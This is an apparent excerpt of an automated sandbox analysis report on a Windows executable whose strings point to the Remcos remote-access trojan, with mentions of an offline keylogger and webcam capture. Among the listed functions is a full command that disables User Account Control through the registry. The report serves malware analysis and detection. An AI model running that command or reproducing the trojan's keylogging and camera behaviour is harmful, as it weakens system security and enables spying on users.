                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1569AC11 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,1569A523,00000000), ref: 1569AC20
                                                                                                                                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,1569A523,00000000), ref: 1569AC34
                                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,1569A523,00000000), ref: 1569AC41
                                                                                                                                                    • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,1569A523,00000000), ref: 1569AC50
                                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,1569A523,00000000), ref: 1569AC62
                                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,1569A523,00000000), ref: 1569AC65
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 221034970-0
                                                                                                                                                    • Opcode ID: e5c36e42f113ff8bc7ef25224b6b77883a924020c74d19f158b4960a69142924
                                                                                                                                                    • Instruction ID: bedf5223065262c9987675bf661c57df8aea886ede50f78ac263985301efcb32
                                                                                                                                                    • Opcode Fuzzy Hash: e5c36e42f113ff8bc7ef25224b6b77883a924020c74d19f158b4960a69142924
                                                                                                                                                    • Instruction Fuzzy Hash: 0BF0CD7561122CAFD710AB24AC88EBF3BACDB46261F00001DFE48E6240EF749E05CAE4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 156C3435 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 116COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\fu56fbrtn8.exe,00000104), ref: 156C3475
                                                                                                                                                    • _free.LIBCMT ref: 156C3540
                                                                                                                                                    • _free.LIBCMT ref: 156C354A
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free$FileModuleName
                                                                                                                                                    • String ID: C:\Users\user\Desktop\fu56fbrtn8.exe$p&y
                                                                                                                                                    • API String ID: 2506810119-711275088
                                                                                                                                                    • Opcode ID: c43d0c04aa5512b46ba6b251d961c559ad94adc0c80cd53c8f79ebe81ae9bf29
                                                                                                                                                    • Instruction ID: 74444ab90d9f5bab61640ac220ae92d55ff4dbacb784d02fea57a9062b2e225f
                                                                                                                                                    • Opcode Fuzzy Hash: c43d0c04aa5512b46ba6b251d961c559ad94adc0c80cd53c8f79ebe81ae9bf29
                                                                                                                                                    • Instruction Fuzzy Hash: 263180B5F05258AFDB22DF99DD84D9EBBBCEB85311B5041DBE40497210DA70AB40CBE4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1569B68A Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 91COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 1569361B: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,156F50E4), ref: 1569363D
                                                                                                                                                      • Part of subcall function 1569361B: RegQueryValueExW.ADVAPI32(?,1568F313,00000000,00000000,?,00000400), ref: 1569365C
                                                                                                                                                      • Part of subcall function 1569361B: RegCloseKey.ADVAPI32(?), ref: 15693665
                                                                                                                                                      • Part of subcall function 1569BFB7: GetCurrentProcess.KERNEL32(?,?,?,1568DAAA,WinDir,00000000,00000000), ref: 1569BFC8
                                                                                                                                                      • Part of subcall function 1569BFB7: IsWow64Process.KERNEL32(00000000,?,?,1568DAAA,WinDir,00000000,00000000), ref: 1569BFCF
                                                                                                                                                    • _wcslen.LIBCMT ref: 1569B763
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
                                                                                                                                                    • String ID: .exe$http\shell\open\command$program files (x86)\$program files\
                                                                                                                                                    • API String ID: 3286818993-4246244872
                                                                                                                                                    • Opcode ID: 73ac7016c947025d2f093784df4ea570aa2bec1b8354b9c9126fffed41dce4e8
                                                                                                                                                    • Instruction ID: 808e4d3b0e080b53f053da9cc8ecb27f51bab3faa9afe2ecc74eb0b178457ae9
                                                                                                                                                    • Opcode Fuzzy Hash: 73ac7016c947025d2f093784df4ea570aa2bec1b8354b9c9126fffed41dce4e8
                                                                                                                                                    • Instruction Fuzzy Hash: C721867AB062046BDB18EAB48C959AE77ADDB45120B44053DE406A7290EE24BD09C3E8
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1568B164 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68timeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetLocalTime.KERNEL32(?,Offline Keylogger Started,156F50F0), ref: 1568B172
                                                                                                                                                    • wsprintfW.USER32 ref: 1568B1F3
                                                                                                                                                      • Part of subcall function 1568A636: SetEvent.KERNEL32(00000000,?,00000000,1568B20A,00000000), ref: 1568A662
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: EventLocalTimewsprintf
                                                                                                                                                    • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                                                                                                                                    • API String ID: 1497725170-248792730
                                                                                                                                                    • Opcode ID: bc22cf2ed6e595287bf2462af30df796f6da5d71e2e66ee425e62748b7258694
                                                                                                                                                    • Instruction ID: 3984b3615f81e3d90f05e2e6f00824f97841e3801ad4b1ba79d1d46735ba9446
                                                                                                                                                    • Opcode Fuzzy Hash: bc22cf2ed6e595287bf2462af30df796f6da5d71e2e66ee425e62748b7258694
                                                                                                                                                    • Instruction Fuzzy Hash: C111367A615118AACB18DB94EC548FE77FDEE48261B00011EF44696190FF78BE85C7EC
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1569D50F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57registryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • RegisterClassExA.USER32(00000030), ref: 1569D55B
                                                                                                                                                    • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 1569D576
                                                                                                                                                    • GetLastError.KERNEL32 ref: 1569D580
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ClassCreateErrorLastRegisterWindow
                                                                                                                                                    • String ID: 0$MsgWindowClass
                                                                                                                                                    • API String ID: 2877667751-2410386613
                                                                                                                                                    • Opcode ID: ce814d2d095d7595f885d1c7201aeaa8d1ce721d7855f83de2b5a775bb404f24
                                                                                                                                                    • Instruction ID: 1f00d6e8a543e1336fd118016bb3b81b4a93dba4f9b495de7e34a4a176562f5e
                                                                                                                                                    • Opcode Fuzzy Hash: ce814d2d095d7595f885d1c7201aeaa8d1ce721d7855f83de2b5a775bb404f24
                                                                                                                                                    • Instruction Fuzzy Hash: 1601D7B191121DAFDB00DFD5DCC49EFBBBDFA04294B40052AF911A6240EB7159058BE0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02DE355C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02DE357E
                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,02DE35CD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02DE35B1
                                                                                                                                                    • RegCloseKey.ADVAPI32(?,02DE35D4,00000000,?,00000004,00000000,02DE35CD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02DE35C7
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                                                                    • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                                                                    • API String ID: 3677997916-4173385793
                                                                                                                                                    • Opcode ID: 4b0b3e02a2b12ce1148d289d8dc1f20f50a31b1017abe53721f60084c72dd486
                                                                                                                                                    • Instruction ID: 20ec4cb9067470a4a1e4ecb16ee63d21d44afa12a25be599d1604c25b240688d
                                                                                                                                                    • Opcode Fuzzy Hash: 4b0b3e02a2b12ce1148d289d8dc1f20f50a31b1017abe53721f60084c72dd486
                                                                                                                                                    • Instruction Fuzzy Hash: 2001B575A40248BAEF11EB919C42FBEB3ECEB08700F5045A5BA05D7780E6759E54CB64
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 15687755 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43processCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 1568779B
                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 156877AA
                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 156877AF
                                                                                                                                                    Strings
                                                                                                                                                    • C:\Windows\System32\cmd.exe, xrefs: 15687796
                                                                                                                                                    • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 15687791
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseHandle$CreateProcess
                                                                                                                                                    • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                                                                                                    • API String ID: 2922976086-4183131282
                                                                                                                                                    • Opcode ID: 9904cd65c2cc293f009faa74cb7f8d4bc9e4a6944c59535d9ce333c9ea81829b
                                                                                                                                                    • Instruction ID: 234e6bfe6c7e8678221b7e18e02ac9bd23d5784efcc19579d773e7eda3856851
                                                                                                                                                    • Opcode Fuzzy Hash: 9904cd65c2cc293f009faa74cb7f8d4bc9e4a6944c59535d9ce333c9ea81829b
                                                                                                                                                    • Instruction Fuzzy Hash: BCF01D76D011AC7ACB20AAD69C49EDF7F7DEBC5B21F00056AFA08A6140DA717404CBF4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 15687260 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    • C:\Users\user\Desktop\fu56fbrtn8.exe, xrefs: 156876C4
                                                                                                                                                    • Rmc-VLI916, xrefs: 156876DA
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: C:\Users\user\Desktop\fu56fbrtn8.exe$Rmc-VLI916
                                                                                                                                                    • API String ID: 0-3200063905
                                                                                                                                                    • Opcode ID: 65a2d1ab578bb930dbf81a5846d0daf6dc364b078ec8027065781ba69882e9b0
                                                                                                                                                    • Instruction ID: 042c4356ed6b107a09223d150a67d2c0f54d8803f29c4e12496fab477be5a47d
                                                                                                                                                    • Opcode Fuzzy Hash: 65a2d1ab578bb930dbf81a5846d0daf6dc364b078ec8027065781ba69882e9b0
                                                                                                                                                    • Instruction Fuzzy Hash: 76F0F630F22365DBCB045B248878B1C3A6BB741656F84081AE842CA684DF3A18D0C7D4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 156C333A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,156C32EB,00000000,?,156C328B,00000000,156EE948,0000000C,156C33E2,00000000,00000002), ref: 156C335A
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 156C336D
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,156C32EB,00000000,?,156C328B,00000000,156EE948,0000000C,156C33E2,00000000,00000002), ref: 156C3390
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                                                                    • Opcode ID: b01900826af76f305ed7b3d9d32b972b1196a4377f8be8d144e9a3f9472bf7d7
                                                                                                                                                    • Instruction ID: 6fbaf24d57046dde38b6959e89230784b977a5163f218d290c1d5375ec6476f1
                                                                                                                                                    • Opcode Fuzzy Hash: b01900826af76f305ed7b3d9d32b972b1196a4377f8be8d144e9a3f9472bf7d7
                                                                                                                                                    • Instruction Fuzzy Hash: A2F04434A1521CFBCB11AF54DC48BADBFB9EF04256F01459DFC46A2140DF309A40CAD0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 156850E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,156F4EF8,15684E7A,00000001,?,00000000,156F4EF8,15684CA8,00000000,00000000,00000000,00000000), ref: 15685120
                                                                                                                                                    • SetEvent.KERNEL32(?,?,00000000,156F4EF8,15684CA8,00000000,00000000,00000000,00000000), ref: 1568512C
                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,156F4EF8,15684CA8,00000000,00000000,00000000,00000000), ref: 15685137
                                                                                                                                                    • CloseHandle.KERNEL32(?,?,00000000,156F4EF8,15684CA8,00000000,00000000,00000000,00000000), ref: 15685140
                                                                                                                                                      • Part of subcall function 1569B4EF: GetLocalTime.KERNEL32(00000000), ref: 1569B509
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                                                                                                    • String ID: KeepAlive | Disabled
                                                                                                                                                    • API String ID: 2993684571-305739064
                                                                                                                                                    • Opcode ID: 179a41b574580e1949ebbc03f89b2ca09746c94a05c5e8383f27e846a106bd91
                                                                                                                                                    • Instruction ID: 28d615dd576cd2d427baeb431e49f6a6256f83e16e413ef8908820166bd443b7
                                                                                                                                                    • Opcode Fuzzy Hash: 179a41b574580e1949ebbc03f89b2ca09746c94a05c5e8383f27e846a106bd91
                                                                                                                                                    • Instruction Fuzzy Hash: 6CF0B475925324BFEB217B748D4996E7F9AAB12220F00091DFCC381654DE216850CBE2
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1569CD58 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,1569CDED), ref: 1569CD62
                                                                                                                                                    • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,1569CDED), ref: 1569CD6F
                                                                                                                                                    • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,1569CDED), ref: 1569CD7C
                                                                                                                                                    • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,1569CDED), ref: 1569CD8F
                                                                                                                                                    Strings
                                                                                                                                                    • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 1569CD82
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                                                                                                                    • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                                                                                                                    • API String ID: 3024135584-2418719853
                                                                                                                                                    • Opcode ID: d588625469c855aa5a287c000b59e21d9afcad2dcc50ee8944502a8796190bf8
                                                                                                                                                    • Instruction ID: 1a2832670c9b3367a4eafa373dbb4c5fcb90f457daec9222e59cce133fd47c2b
                                                                                                                                                    • Opcode Fuzzy Hash: d588625469c855aa5a287c000b59e21d9afcad2dcc50ee8944502a8796190bf8
                                                                                                                                                    • Instruction Fuzzy Hash: ACE04F7291032DABE31067B59C8DDEB7B6DE785632B100A59FE6281182DF305450C6F1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 156C139A Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: b045f9a906c9f980da8bd7fcc30f182821ea88feedf8ee749aec0627605119ad
                                                                                                                                                    • Instruction ID: d58403ac1808f487142db62821f3df818ecea562a41b3c72337ca07b1ec97ea7
                                                                                                                                                    • Opcode Fuzzy Hash: b045f9a906c9f980da8bd7fcc30f182821ea88feedf8ee749aec0627605119ad
                                                                                                                                                    • Instruction Fuzzy Hash: E671E9B5E04257DBCB11CF94C884AAFBB79FF45360F9542AAE82267680DB709941C7E0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 15684371 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 206sleepCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • Sleep.KERNEL32(00000000,?), ref: 156844C4
                                                                                                                                                      • Part of subcall function 15684607: __EH_prolog.LIBCMT ref: 1568460C
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: H_prologSleep
                                                                                                                                                    • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
                                                                                                                                                    • API String ID: 3469354165-3547787478
                                                                                                                                                    • Opcode ID: a24d2170b5b2df865f5efb982dfbdb5c74f00c0846c493dac091baa9dbe2bc56
                                                                                                                                                    • Instruction ID: c1c927318a2e3c76bb00d2db6c822d2a991f510cb673be8132e911583a2aaee2
                                                                                                                                                    • Opcode Fuzzy Hash: a24d2170b5b2df865f5efb982dfbdb5c74f00c0846c493dac091baa9dbe2bc56
                                                                                                                                                    • Instruction Fuzzy Hash: 2D510879F0A3149BCB14EB34CC64A6E3B9AAF85654F40051DE80657BD0EF30B909C7EA
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 156C4CFB Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 156C6137: HeapAlloc.KERNEL32(00000000,156B52BC,?,?,156B8847,?,?,00000000,156F6B50,?,1568DE62,156B52BC,?,?,?,?), ref: 156C6169
                                                                                                                                                    • _free.LIBCMT ref: 156C4E06
                                                                                                                                                    • _free.LIBCMT ref: 156C4E1D
                                                                                                                                                    • _free.LIBCMT ref: 156C4E3C
                                                                                                                                                    • _free.LIBCMT ref: 156C4E57
                                                                                                                                                    • _free.LIBCMT ref: 156C4E6E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free$AllocHeap
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1835388192-0
                                                                                                                                                    • Opcode ID: 082ce42ebac7409b0ba13b001e32131762cd8fa2b8a7f6ef0563b5db0503a7c3
                                                                                                                                                    • Instruction ID: 4a252b80cb3ac461a6f3a05a86a8ef80ccb3f03460619e55aed8575ebd2dcc67
                                                                                                                                                    • Opcode Fuzzy Hash: 082ce42ebac7409b0ba13b001e32131762cd8fa2b8a7f6ef0563b5db0503a7c3
                                                                                                                                                    • Instruction Fuzzy Hash: B151BF71A01305AFD711DF29CC80E6AB7F5FF49726B0146A9E819DB650E731BA01CBD4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 156C9365 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
